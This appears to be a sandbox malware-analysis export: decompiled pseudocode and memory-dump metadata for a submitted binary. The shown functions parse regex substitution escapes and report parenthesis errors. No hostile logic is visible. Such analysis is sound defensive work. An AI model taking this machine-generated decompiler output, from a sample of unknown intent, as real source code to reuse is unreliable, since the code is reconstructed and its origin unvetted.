                                                    											_t324 =  *(_t338 + 8) -  *(_t334 + 4);
                                                    											 *((char*)( *((intOrPtr*)(_t338 + 0xc)))) = 1;
                                                    											if( *(_t338 - 0x10) != 0) {
                                                    												E00406AEB( *((intOrPtr*)(_t338 + 0x10)), _t338 - 0x18);
                                                    											}
                                                    											 *(_t338 - 0x18) = 1;
                                                    											 *(_t338 - 0x14) = 0xfffffffe;
                                                    											L21:
                                                    											E00406AEB( *((intOrPtr*)(_t338 + 0x10)), _t338 - 0x18);
                                                    											 *(_t338 - 0x18) = 0;
                                                    											 *(_t338 - 0x14) = _t324;
                                                    											while(1) {
                                                    												L1:
                                                    												 *(_t338 - 0x10) = 0;
                                                    												goto L2;
                                                    											}
                                                    										}
                                                    									}
                                                    									L54:
                                                    								}
                                                    							}
                                                    						}
                                                    						break;
                                                    					}
                                                    					__eflags =  *(_t338 - 0x10);
                                                    					if( *(_t338 - 0x10) != 0) {
                                                    						_t158 = E00407990( *((intOrPtr*)(_t338 + 0x10)), _t338 + 0x10,  *((intOrPtr*)( *((intOrPtr*)(_t338 + 0x10)) + 4)), _t338 - 0x18);
                                                    					}
                                                    					 *[fs:0x0] =  *((intOrPtr*)(_t338 - 0xc));
                                                    					return _t158;
                                                    					goto L54;
                                                    				}
                                                    			}


                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.259443485.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.259439860.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.259443485.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.259443485.000000000047B000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_02hNixBIvP.jbxd
                                                    Similarity
                                                    • API ID: ExceptionThrowstrlen$H_prolog
                                                    • String ID: expecting escape sequence in substitution string$invalid backreference in substitution
                                                    • API String ID: 875129476-967196223
                                                    • Opcode ID: e428f2da547132be2edef280d7813516bedc59247fb0f00e784e4b5edfce4d5d
                                                    • Instruction ID: 3761f46dd23904d97e1b94dca212cf1cba20719bb6d9752a604dd134c7b2255e
                                                    • Opcode Fuzzy Hash: e428f2da547132be2edef280d7813516bedc59247fb0f00e784e4b5edfce4d5d
                                                    • Instruction Fuzzy Hash: 5CE14271A0060ADFCF14DFA8C8949EEBBB5FF44300F11852EE917A7281D778AA45CB95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 54%
                                                    			E004050B8(intOrPtr __ecx) {
                                                    				signed int _t484;
                                                    				char _t487;
                                                    				intOrPtr _t490;
                                                    				void* _t516;
                                                    				signed int* _t518;
                                                    				signed int _t534;
                                                    				signed int _t535;
                                                    				void* _t560;
                                                    				signed int* _t561;
                                                    				void* _t563;
                                                    				char* _t567;
                                                    				void* _t568;
                                                    
                                                    				L004153D0();
                                                    				_t564 = __ecx;
                                                    				 *(_t568 - 0x24) =  *(_t568 - 0x24) & 0;
                                                    				 *((intOrPtr*)(_t568 - 0x10)) = __ecx;
                                                    				 *(_t568 - 0x20) = 0;
                                                    				 *(_t568 - 0x30) =  *(_t568 - 0x30) & 0;
                                                    				 *(_t568 - 4) = 0;
                                                    				 *((intOrPtr*)(_t568 - 0x2c)) = 0;
                                                    				_t561 =  *(_t568 + 0x10);
                                                    				 *(_t568 - 0x34) =  *(_t568 - 0x34) & 0;
                                                    				_t517 =  *(__ecx + 0x27);
                                                    				 *(_t568 - 4) = 1;
                                                    				 *((char*)(_t568 + 0x13)) = ( *_t561 & 0x00000100) == 0x100;
                                                    				 *0x41720c(_t560, _t563, _t516);
                                                    				_t518 =  *(_t568 + 8);
                                                    				asm("sbb ecx, ecx");
                                                    				if(( ~(( *(__ecx + 0x27))[1]) & _t517[2] + ( *(__ecx + 0x27))[1]) !=  *_t518) {
                                                    					 *(_t568 + 8) =  *(__ecx + 0x27);
                                                    					 *0x41720c();
                                                    					asm("sbb edx, edx");
                                                    					_t484 = E00406B23(_t561, _t518,  ~(( *(_t568 + 8))[1]) & ( *(_t568 + 8))[2] + ( *(_t568 + 8))[1]);
                                                    					__eflags = _t484 - 0x21;
                                                    					if(__eflags > 0) {
                                                    						L18:
                                                    						__eflags =  *(_t568 - 0x20);
                                                    						if( *(_t568 - 0x20) != 0) {
                                                    							_push(_t561);
                                                    							_push( *(_t568 - 0x34));
                                                    							_push(_t518);
                                                    							_push(_t568 - 0x24);
                                                    							E00408D03(_t564);
                                                    							_t490 =  *((intOrPtr*)(_t568 + 0xc));
                                                    							_t534 =  *(_t568 - 0x20);
                                                    							 *(_t568 - 0x24) =  *(_t568 - 0x24) & 0x00000000;
                                                    							 *( *(_t490 + 0x1c)) = _t534;
                                                    							_t535 = _t534 + 4;
                                                    							__eflags = _t535;
                                                    							 *(_t490 + 0x1c) = _t535;
                                                    						}
                                                    						L20:
                                                    						 *(_t568 - 4) =  *(_t568 - 4) & 0x00000000;
                                                    						E0040C5ED(_t568 - 0x30);
                                                    						_t101 = _t568 - 4;
                                                    						 *_t101 =  *(_t568 - 4) | 0xffffffff;
                                                    						__eflags =  *_t101;
                                                    						E00406ED3(_t568 - 0x24);
                                                    						_t487 = 1;
                                                    						goto L21;
                                                    					}
                                                    					switch( *((intOrPtr*)(_t484 * 4 +  &M00405D48))) {
                                                    						case 0:
                                                    							 *(_t568 + 0x10) =  *(__ecx + 0x27);
                                                    							 *0x41720c();
                                                    							_t492 =  *(_t568 + 0x10);
                                                    							_t537 = _t492[1];
                                                    							asm("sbb edx, edx");
                                                    							__eflags = ( ~_t537 & _t492[2] + _t537) -  *_t518;
                                                    							if(( ~_t537 & _t492[2] + _t537) !=  *_t518) {
                                                    								_push(_t561);
                                                    								_push( *((intOrPtr*)(_t568 + 0xc)));
                                                    								_push(_t518);
                                                    								E00405EEA(__ecx);
                                                    								goto L15;
                                                    							}
                                                    							_t498 =  *((intOrPtr*)(_t568 + 0xc));
                                                    							__eflags =  *(_t498 + 0x10);
                                                    							if( *(_t498 + 0x10) == 0) {
                                                    								goto L10;
                                                    							}
                                                    							_push(0);
                                                    							 *((char*)(_t568 - 0x64)) =  *((intOrPtr*)(_t568 + 0xf));
                                                    							 *0x417230();
                                                    							_t566 = "mismatched parenthesis";
                                                    							_push(strlen(_t566));
                                                    							_push(_t566);
                                                    							 *0x417234();
                                                    							 *(_t568 - 4) = 3;
                                                    							E00404FA7(_t568 - 0x9c, _t568 - 0x64);
                                                    							 *((intOrPtr*)(_t568 - 0x9c)) = 0x417698;
                                                    							_push(0x4196f8);
                                                    							_t505 = _t568 - 0x9c;
                                                    							goto L9;
                                                    						case 1:
                                                    							__ecx = __esi;
                                                    							__eax = E00404705(__ecx, __ebx,  *(__ebp + 0xc), __edi,  *(__ebp + 0x14));
                                                    							__eflags = __eax;
                                                    							_t82 = __eax != 0;
                                                    							__eflags = _t82;
                                                    							__ecx = __ecx & 0xffffff00 | _t82;
                                                    							 *(__ebp - 0x10) = __eax;
                                                    							__eax = __ebp - 0x14;
                                                    							 *(__ebp - 0x14) = __cl;
                                                    							__ecx = __ebp - 0x24;
                                                    							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
                                                    							__ecx = __ebp - 0x14;
                                                    							__eax = E00406ED3(__ecx);
                                                    							 *((char*)(__ebp - 0x34)) = 1;
                                                    							goto L18;
                                                    						case 2:
                                                    							__eax =  *(__ebp + 0xc);
                                                    							__eflags =  *(__eax + 0x10);
                                                    							if( *(__eax + 0x10) != 0) {
                                                    								L10:
                                                    								_t520 = 0;
                                                    								goto L16;
                                                    							}
                                                    							__al =  *((intOrPtr*)(__ebp + 0xf));
                                                    							_push(0);
                                                    							__ecx = __ebp - 0x44;
                                                    							 *(__ebp - 0x44) =  *((intOrPtr*)(__ebp + 0xf));
                                                    							__eax =  *0x417230();
                                                    							__esi = "mismatched parenthesis";
                                                    							__eax = strlen(__esi);
                                                    							_pop(__ecx);
                                                    							_push(__eax);
                                                    							_push(__esi);
                                                    							__ecx = __ebp - 0x44;
                                                    							 *0x417234() = __ebp - 0x44;
                                                    							__ecx = __ebp - 0xd4;
                                                    							 *((char*)(__ebp - 4)) = 4;
                                                    							__eax = E00404FA7(__ecx, __ebp - 0x44);
                                                    							 *(__ebp - 0xd4) = 0x417698;
                                                    							_push(0x4196f8);
                                                    							__eax = __ebp - 0xd4;
                                                    							L9:
                                                    							_push(_t505);
                                                    							L004153FE();
                                                    							goto L10;
                                                    						case 3:
                                                    							__esi =  *(__ebp + 0xc);
                                                    							__ecx = __esi;
                                                    							 *__esi =  *((intOrPtr*)( *__esi + 0x38))();
                                                    							__ecx = __esi[0x1c];
                                                    							 *(__esi[0x1c]) =  *__esi;
                                                    							__ecx = __esi;
                                                    							__eax = E00406F41(__ecx);
                                                    							L15:
                                                    							_t520 = 1;
                                                    							L16:
                                                    							 *(_t568 - 4) =  *(_t568 - 4) & 0x00000000;
                                                    							E0040C5ED(_t568 - 0x30);
                                                    							 *(_t568 - 4) =  *(_t568 - 4) | 0xffffffff;
                                                    							E00406ED3(_t568 - 0x24);
                                                    							_t487 = _t520;
                                                    							goto L21;
                                                    						case 4:
                                                    							__eax =  *__edi;
                                                    							__ecx =  &(__esi[4]);
                                                    							__eax = E00409233( *__edi,  &(__esi[4]));
                                                    							_pop(__ecx);
                                                    							 *(__ebp - 0x10) = __eax;
                                                    							_pop(__ecx);
                                                    							__eflags = __eax;
                                                    							__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
                                                    							__eax = __ebp - 0x14;
                                                    							 *(__ebp - 0x14) = __cl;
                                                    							__ecx = __ebp - 0x24;
                                                    							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
                                                    							__ecx = __ebp - 0x14;
                                                    							goto L95;
                                                    						case 5:
                                                    							__eax =  *__edi;
                                                    							__ecx =  &(__esi[4]);
                                                    							__eax = E0040927C( *__edi,  &(__esi[4]));
                                                    							_pop(__ecx);
                                                    							 *(__ebp - 0x10) = __eax;
                                                    							_pop(__ecx);
                                                    							__eflags = __eax;
                                                    							__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
                                                    							__eax = __ebp - 0x14;
                                                    							 *(__ebp - 0x14) = __cl;
                                                    							__ecx = __ebp - 0x24;
                                                    							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
                                                    							__ecx = __ebp - 0x14;
                                                    							goto L95;
                                                    						case 6:
                                                    							__ecx = __esi[4];
                                                    							__eax = E0040507F(__ecx, 0x40);
                                                    							 *(__ebp + 0x10) = __eax;
                                                    							 *(__ebp + 8) = __eax;
                                                    							__eflags = __eax;
                                                    							 *((char*)(__ebp - 4)) = 5;
                                                    							if(__eax == 0) {
                                                    								__eax = 0;
                                                    								__eflags = 0;
                                                    							} else {
                                                    								__ecx =  *(__ebp + 0x10);
                                                    								__eax =  &(__esi[4]);
                                                    								_push( &(__esi[4]));
                                                    								__eax = E00405DE3(__ecx);
                                                    								__eax =  *(__ebp + 0x10);
                                                    								 *__eax = 0x4177a0;
                                                    							}
                                                    							__eflags = __eax;
                                                    							__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
                                                    							 *(__ebp - 0x10) = __eax;
                                                    							__eax = __ebp - 0x14;
                                                    							 *(__ebp - 0x14) = __cl;
                                                    							__ecx = __ebp - 0x30;
                                                    							 *((char*)(__ebp - 4)) = 1;
                                                    							__eax = E0040BFD3(__ebp - 0x30, __ebp - 0x14);
                                                    							__ecx = __ebp - 0x14;
                                                    							__eax = E0040C5ED(__ebp - 0x14);
                                                    							__ecx = __esi[0x27];
                                                    							 *(__ebp + 0x10) = __esi[0x27];
                                                    							__eax =  *0x41720c();
                                                    							__eax =  *(__ebp + 0x10);
                                                    							__ecx =  *(__eax + 4);
                                                    							__eax =  *(__eax + 8);
                                                    							__edx = __ecx;
                                                    							__eax = __eax + __ecx;
                                                    							__edx =  ~__ecx;
                                                    							asm("sbb edx, edx");
                                                    							__edx =  ~__ecx & __eax;
                                                    							__ebp - 0x30 = E004092C5(__ebx, __ebp - 0x30, __ebx, __edx, __edi);
                                                    							__eax =  *__edi;
                                                    							__ecx =  &(__esi[4]);
                                                    							_push(__ecx);
                                                    							_push( *__edi);
                                                    							_push( *((intOrPtr*)(__ebp - 0x2c)));
                                                    							__eax = E00409941(__ecx);
                                                    							__esp = __esp + 0x1c;
                                                    							 *(__ebp - 0x10) = __eax;
                                                    							__eflags = __eax;
                                                    							__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
                                                    							__eax = __ebp - 0x14;
                                                    							 *(__ebp - 0x14) = __cl;
                                                    							__ecx = __ebp - 0x24;
                                                    							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
                                                    							__ecx = __ebp - 0x14;
                                                    							__eax = E00406ED3(__ecx);
                                                    							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                    							goto L18;
                                                    						case 7:
                                                    							__eax =  *__edi;
                                                    							__ecx =  &(__esi[4]);
                                                    							__eax = E004099FB( *__edi,  &(__esi[4]));
                                                    							_pop(__ecx);
                                                    							 *(__ebp - 0x10) = __eax;
                                                    							_pop(__ecx);
                                                    							__eflags = __eax;
                                                    							__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
                                                    							__eax = __ebp - 0x14;
                                                    							 *(__ebp - 0x14) = __cl;
                                                    							__ecx = __ebp - 0x24;
                                                    							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
                                                    							__ecx = __ebp - 0x14;
                                                    							goto L95;
                                                    						case 8:
                                                    							__ecx = __esi[0x27];
                                                    							 *(__ebp + 8) = __esi[0x27];
                                                    							__eax =  *0x41720c();
                                                    							__eax =  *(__ebp + 8);
                                                    							__ecx =  *(__eax + 4);
                                                    							__eax =  *(__eax + 8);
                                                    							__edx = __ecx;
                                                    							__eax = __eax + __ecx;
                                                    							__edx =  ~__ecx;
                                                    							asm("sbb edx, edx");
                                                    							__edx =  ~__ecx & __eax;
                                                    							__eax =  *__ebx;
                                                    							__eflags = __edx - __eax;
                                                    							if(__edx != __eax) {
                                                    								__cl =  *__eax;
                                                    								__eflags = __cl - 0x30;
                                                    								if(__cl < 0x30) {
                                                    									L57:
                                                    									__eflags = __cl - 0x65;
                                                    									if(__cl != 0x65) {
                                                    										__eflags = __cl - 0x78;
                                                    										if(__cl != 0x78) {
                                                    											__eflags = __cl - 0x63;
                                                    											if(__cl != 0x63) {
                                                    												__eflags = __cl - 0x61;
                                                    												if(__cl != 0x61) {
                                                    													L80:
                                                    													__eflags = __cl - 0x66;
                                                    													if(__cl != 0x66) {
                                                    														L83:
                                                    														__eflags = __cl - 0x6e;
                                                    														if(__cl != 0x6e) {
                                                    															L86:
                                                    															__eflags = __cl - 0x72;
                                                    															if(__cl != 0x72) {
                                                    																L89:
                                                    																__eflags = __cl - 0x74;
                                                    																if(__cl != 0x74) {
                                                    																	L92:
                                                    																	__eflags = __cl - 0x5c;
                                                    																	if(__cl != 0x5c) {
                                                    																		L96:
                                                    																		_push(__edi);
                                                    																		_push(__ecx);
                                                    																		__eax = E00409CBB();
                                                    																		_pop(__ecx);
                                                    																		__eflags = __eax;
                                                    																		_pop(__ecx);
                                                    																		if(__eax == 0) {
                                                    																			__eax =  *__edi;
                                                    																			__ecx =  &(__esi[4]);
                                                    																			__eax =  *__ebx;
                                                    																			__al =  *( *__ebx);
                                                    																			__eax = E00409BC5(__esi,  *__ebx,  *__edi,  &(__esi[4]));
                                                    																			 *(__ebp - 0x10) = __eax;
                                                    																			__eflags = __eax;
                                                    																			__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
                                                    																			__eax = __ebp - 0x14;
                                                    																			 *(__ebp - 0x14) = __cl;
                                                    																			__ecx = __ebp - 0x24;
                                                    																			__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
                                                    																			__ecx = __ebp - 0x14;
                                                    																		} else {
                                                    																			__ecx =  *__edi;
                                                    																			__edx =  &(__esi[4]);
                                                    																			__eax = E00409B0F(__eax,  *__edi,  &(__esi[4]));
                                                    																			 *(__ebp - 0x10) = __eax;
                                                    																			__eflags = __eax;
                                                    																			__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
                                                    																			__eax = __ebp - 0x14;
                                                    																			 *(__ebp - 0x14) = __cl;
                                                    																			__ecx = __ebp - 0x24;
                                                    																			__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
                                                    																			__ecx = __ebp - 0x14;
                                                    																		}
                                                    																		L44:
                                                    																		__eax = E00406ED3(__ecx);
                                                    																		 *__ebx =  *__ebx + 1;
                                                    																		goto L18;
                                                    																	}
                                                    																	__eflags =  *(__ebp + 0x13);
                                                    																	if( *(__ebp + 0x13) == 0) {
                                                    																		goto L96;
                                                    																	}
                                                    																	__eax = __eax + 1;
                                                    																	__ecx =  &(__esi[4]);
                                                    																	 *__ebx = __eax;
                                                    																	__eax =  *__edi;
                                                    																	__eax = E00409BC5(__esi, 0x5c,  *__edi,  &(__esi[4]));
                                                    																	 *(__ebp - 0x10) = __eax;
                                                    																	__eflags = __eax;
                                                    																	_t420 = __eax != 0;
                                                    																	__eflags = _t420;
                                                    																	__ecx = __ecx & 0xffffff00 | _t420;
                                                    																	__eax = __ebp - 0x14;
                                                    																	 *(__ebp - 0x14) = __cl;
                                                    																	__ecx = __ebp - 0x24;
                                                    																	__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
                                                    																	__ecx = __ebp - 0x14;
                                                    																	goto L95;
                                                    																}
                                                    																__eflags =  *(__ebp + 0x13);
                                                    																if( *(__ebp + 0x13) == 0) {
                                                    																	goto L92;
                                                    																}
                                                    																__eax = __eax + 1;
                                                    																__ecx =  &(__esi[4]);
                                                    																 *__ebx = __eax;
                                                    																__eax =  *__edi;
                                                    																__eax = E00409BC5(__esi, 9,  *__edi,  &(__esi[4]));
                                                    																 *(__ebp - 0x10) = __eax;
                                                    																__eflags = __eax;
                                                    																__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
                                                    																__eax = __ebp - 0x14;
                                                    																 *(__ebp - 0x14) = __cl;
                                                    																__ecx = __ebp - 0x24;
                                                    																__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
                                                    																__ecx = __ebp - 0x14;
                                                    																goto L95;
                                                    															}
                                                    															__eflags =  *(__ebp + 0x13);
                                                    															if( *(__ebp + 0x13) == 0) {
                                                    																goto L89;
                                                    															}
                                                    															__eax = __eax + 1;
                                                    															__ecx =  &(__esi[4]);
                                                    															 *__ebx = __eax;
                                                    															__eax =  *__edi;
                                                    															__eax = E00409BC5(__esi, 0xd,  *__edi,  &(__esi[4]));
                                                    															 *(__ebp - 0x10) = __eax;
                                                    															__eflags = __eax;
                                                    															__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
                                                    															__eax = __ebp - 0x14;
                                                    															 *(__ebp - 0x14) = __cl;
                                                    															__ecx = __ebp - 0x24;
                                                    															__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
                                                    															__ecx = __ebp - 0x14;
                                                    															goto L95;
                                                    														}
                                                    														__eflags =  *(__ebp + 0x13);
                                                    														if( *(__ebp + 0x13) == 0) {
                                                    															goto L86;
                                                    														}
                                                    														__eax = __eax + 1;
                                                    														__ecx =  &(__esi[4]);
                                                    														 *__ebx = __eax;
                                                    														__eax =  *__edi;
                                                    														__eax = E00409BC5(__esi, 0xa,  *__edi,  &(__esi[4]));
                                                    														 *(__ebp - 0x10) = __eax;
                                                    														__eflags = __eax;
                                                    														__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
                                                    														__eax = __ebp - 0x14;
                                                    														 *(__ebp - 0x14) = __cl;
                                                    														__ecx = __ebp - 0x24;
                                                    														__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
                                                    														__ecx = __ebp - 0x14;
                                                    														goto L95;
                                                    													}
                                                    													__eflags =  *(__ebp + 0x13);
                                                    													if( *(__ebp + 0x13) == 0) {
                                                    														goto L83;
                                                    													}
                                                    													__eax = __eax + 1;
                                                    													__ecx =  &(__esi[4]);
                                                    													 *__ebx = __eax;
                                                    													__eax =  *__edi;
                                                    													__eax = E00409BC5(__esi, 0xc,  *__edi,  &(__esi[4]));
                                                    													 *(__ebp - 0x10) = __eax;
                                                    													__eflags = __eax;
                                                    													__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
                                                    													__eax = __ebp - 0x14;
                                                    													 *(__ebp - 0x14) = __cl;
                                                    													__ecx = __ebp - 0x24;
                                                    													__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
                                                    													__ecx = __ebp - 0x14;
                                                    													goto L95;
                                                    												}
                                                    												__eflags =  *(__ebp + 0x13);
                                                    												if( *(__ebp + 0x13) == 0) {
                                                    													goto L80;
                                                    												}
                                                    												__eax = __eax + 1;
                                                    												__ecx =  &(__esi[4]);
                                                    												 *__ebx = __eax;
                                                    												__eax =  *__edi;
                                                    												__eax = E00409BC5(__esi, 7,  *__edi,  &(__esi[4]));
                                                    												 *(__ebp - 0x10) = __eax;
                                                    												__eflags = __eax;
                                                    												__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
                                                    												__eax = __ebp - 0x14;
                                                    												 *(__ebp - 0x14) = __cl;
                                                    												__ecx = __ebp - 0x24;
                                                    												__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
                                                    												__ecx = __ebp - 0x14;
                                                    												goto L95;
                                                    											}
                                                    											__ecx = __esi[0x27];
                                                    											 *(__ebp + 0x10) = __esi[0x27];
                                                    											__eax =  *0x41720c();
                                                    											__eax =  *(__ebp + 0x10);
                                                    											__ecx =  *(__eax + 4);
                                                    											 *__ebx =  *__ebx + 1;
                                                    											__eax =  *(__eax + 8);
                                                    											__edx = __ecx;
                                                    											__eax = __eax + __ecx;
                                                    											__ecx =  *__ebx;
                                                    											__edx =  ~__edx;
                                                    											asm("sbb edx, edx");
                                                    											__edx = __edx & __eax;
                                                    											__eflags = __edx - __ecx;
                                                    											if(__edx == __ecx) {
                                                    												__al =  *((intOrPtr*)(__ebp + 0xf));
                                                    												_push(0);
                                                    												__ecx = __ebp - 0x54;
                                                    												 *(__ebp - 0x54) =  *((intOrPtr*)(__ebp + 0xf));
                                                    												__eax =  *0x417230();
                                                    												__esi = "incomplete escape sequence \\c";
                                                    												__eax = strlen(__esi);
                                                    												_pop(__ecx);
                                                    												_push(__eax);
                                                    												_push(__esi);
                                                    												__ecx = __ebp - 0x54;
                                                    												 *0x417234() = __ebp - 0x54;
                                                    												__ecx = __ebp - 0xb8;
                                                    												 *((char*)(__ebp - 4)) = 6;
                                                    												E00404FA7(__ecx, __ebp - 0x54) = __ebp - 0xb8;
                                                    												_push(0x4196f8);
                                                    												_push(__ebp - 0xb8);
                                                    												 *(__ebp - 0xb8) = 0x417698;
                                                    												L004153FE();
                                                    											}
                                                    											__al =  *__ecx;
                                                    											__ecx = __ecx + 1;
                                                    											__eflags = __al - 0x61;
                                                    											 *__ebx = __ecx;
                                                    											if(__al >= 0x61) {
                                                    												__eflags = __al - 0x7a;
                                                    												if(__al <= 0x7a) {
                                                    													__eax = __al;
                                                    													_push(__al);
                                                    													__eax =  *0x4172a4();
                                                    													_pop(__ecx);
                                                    												}
                                                    											}
                                                    											__ecx =  *__edi;
                                                    											__edx =  &(__esi[4]);
                                                    											__al = __al ^ 0x00000040;
                                                    											__eax = E00409BC5(__esi, __eax,  *__edi,  &(__esi[4]));
                                                    											 *(__ebp - 0x10) = __eax;
                                                    											__eflags = __eax;
                                                    											__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
                                                    											__eax = __ebp - 0x14;
                                                    											 *(__ebp - 0x14) = __cl;
                                                    											__ecx = __ebp - 0x24;
                                                    											__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
                                                    											__ecx = __ebp - 0x14;
                                                    											goto L95;
                                                    										}
                                                    										 *(__ebp + 8) =  *(__ebp + 8) & 0x00000000;
                                                    										 *(__ebp + 0x13) =  *(__ebp + 0x13) & 0x00000000;
                                                    										__eax = __eax + 1;
                                                    										__eflags = __eax;
                                                    										 *__ebx = __eax;
                                                    										while(1) {
                                                    											__ecx = __esi[0x27];
                                                    											 *(__ebp + 0x14) = __esi[0x27];
                                                    											__eax =  *0x41720c();
                                                    											__eax =  *(__ebp + 0x14);
                                                    											__ecx =  *(__eax + 4);
                                                    											__eax =  *(__eax + 8);
                                                    											__edx = __ecx;
                                                    											__eax = __eax + __ecx;
                                                    											__edx =  ~__ecx;
                                                    											asm("sbb edx, edx");
                                                    											__edx =  ~__ecx & __eax;
                                                    											__eax =  *__ebx;
                                                    											__eflags = __edx - __eax;
                                                    											if(__edx == __eax) {
                                                    												break;
                                                    											}
                                                    											__al =  *__eax;
                                                    											__eflags = __al - 0x30;
                                                    											if(__al < 0x30) {
                                                    												L64:
                                                    												__eflags = __al - 0x61;
                                                    												if(__al < 0x61) {
                                                    													L66:
                                                    													__eflags = __al - 0x41;
                                                    													if(__al < 0x41) {
                                                    														break;
                                                    													}
                                                    													__eflags = __al - 0x46;
                                                    													if(__al > 0x46) {
                                                    														break;
                                                    													}
                                                    													L68:
                                                    													__eax = E00402FBD(__eax);
                                                    													__cl =  *(__ebp + 8);
                                                    													__cl =  *(__ebp + 8) << 4;
                                                    													__al = __al + __cl;
                                                    													 *(__ebp + 0x13) =  *(__ebp + 0x13) + 1;
                                                    													 *__ebx =  *__ebx + 1;
                                                    													__eflags =  *(__ebp + 0x13) - 2;
                                                    													 *(__ebp + 8) = __al;
                                                    													if( *(__ebp + 0x13) < 2) {
                                                    														continue;
                                                    													}
                                                    													break;
                                                    												}
                                                    												__eflags = __al - 0x66;
                                                    												if(__al <= 0x66) {
                                                    													goto L68;
                                                    												}
                                                    												goto L66;
                                                    											}
                                                    											__eflags = __al - 0x39;
                                                    											if(__al <= 0x39) {
                                                    												goto L68;
                                                    											}
                                                    											goto L64;
                                                    										}
                                                    										__eax =  *__edi;
                                                    										__ecx =  &(__esi[4]);
                                                    										__eax = E00409BC5(__esi,  *(__ebp + 8),  *__edi,  &(__esi[4]));
                                                    										 *(__ebp - 0x10) = __eax;
                                                    										__eflags = __eax;
                                                    										__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
                                                    										__eax = __ebp - 0x14;
                                                    										 *(__ebp - 0x14) = __cl;
                                                    										__ecx = __ebp - 0x24;
                                                    										__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
                                                    										__ecx = __ebp - 0x14;
                                                    										goto L95;
                                                    									}
                                                    									__eax = __eax + 1;
                                                    									__ecx =  &(__esi[4]);
                                                    									 *__ebx = __eax;
                                                    									__eax =  *__edi;
                                                    									__eax = E00409BC5(__esi, 0x1b,  *__edi,  &(__esi[4]));
                                                    									 *(__ebp - 0x10) = __eax;
                                                    									__eflags = __eax;
                                                    									__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
                                                    									__eax = __ebp - 0x14;
                                                    									 *(__ebp - 0x14) = __cl;
                                                    									__ecx = __ebp - 0x24;
                                                    									__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
                                                    									__ecx = __ebp - 0x14;
                                                    									goto L95;
                                                    								}
                                                    								__eflags = __cl - 0x39;
                                                    								if(__cl > 0x39) {
                                                    									goto L57;
                                                    								}
                                                    								__ecx = __esi[0x27];
                                                    								 *(__ebp - 0x28) = __eax;
                                                    								 *(__ebp + 0x10) = __esi[0x27];
                                                    								__eax =  *0x41720c();
                                                    								__eax =  *(__ebp + 0x10);
                                                    								__ecx =  *(__eax + 4);
                                                    								__eax =  *(__eax + 8);
                                                    								__edx = __ecx;
                                                    								__eax = __eax + __ecx;
                                                    								__edx =  ~__ecx;
                                                    								asm("sbb edx, edx");
                                                    								__edx =  ~__ecx & __eax;
                                                    								__eax = __ebp - 0x28;
                                                    								__eax = E004090FF(__ebp - 0x28, __edx, 0x3e7);
                                                    								__ecx =  *__ebx;
                                                    								__eflags =  *( *__ebx) - 0x30;
                                                    								if( *( *__ebx) == 0x30) {
                                                    									L51:
                                                    									 *(__ebp + 8) =  *(__ebp + 8) & 0x00000000;
                                                    									_t297 = __ebp + 0x13;
                                                    									 *_t297 =  *(__ebp + 0x13) & 0x00000000;
                                                    									__eflags =  *_t297;
                                                    									while(1) {
                                                    										__ecx = __esi[0x27];
                                                    										 *(__ebp + 0x14) = __esi[0x27];
                                                    										__eax =  *0x41720c();
                                                    										__eax =  *(__ebp + 0x14);
                                                    										__ecx =  *(__eax + 4);
                                                    										__eax =  *(__eax + 8);
                                                    										__edx = __ecx;
                                                    										__eax = __eax + __ecx;
                                                    										__edx =  ~__ecx;
                                                    										asm("sbb edx, edx");
                                                    										__edx =  ~__ecx & __eax;
                                                    										__eax =  *__ebx;
                                                    										__eflags = __edx - __eax;
                                                    										if(__edx == __eax) {
                                                    											break;
                                                    										}
                                                    										__cl =  *__eax;
                                                    										__eflags = __cl - 0x30;
                                                    										if(__cl < 0x30) {
                                                    											break;
                                                    										}
                                                    										__eflags = __cl - 0x37;
                                                    										if(__cl > 0x37) {
                                                    											break;
                                                    										}
                                                    										 *(__ebp + 0x13) =  *(__ebp + 0x13) + 1;
                                                    										__eax = __eax + 1;
                                                    										__eflags =  *(__ebp + 0x13) - 3;
                                                    										 *(__ebp + 8) = ( *(__ebp + 8) - 6 << 3) + __cl;
                                                    										 *__ebx = __eax;
                                                    										if( *(__ebp + 0x13) < 3) {
                                                    											continue;
                                                    										}
                                                    										break;
                                                    									}
                                                    									__eax =  *__edi;
                                                    									__ecx =  &(__esi[4]);
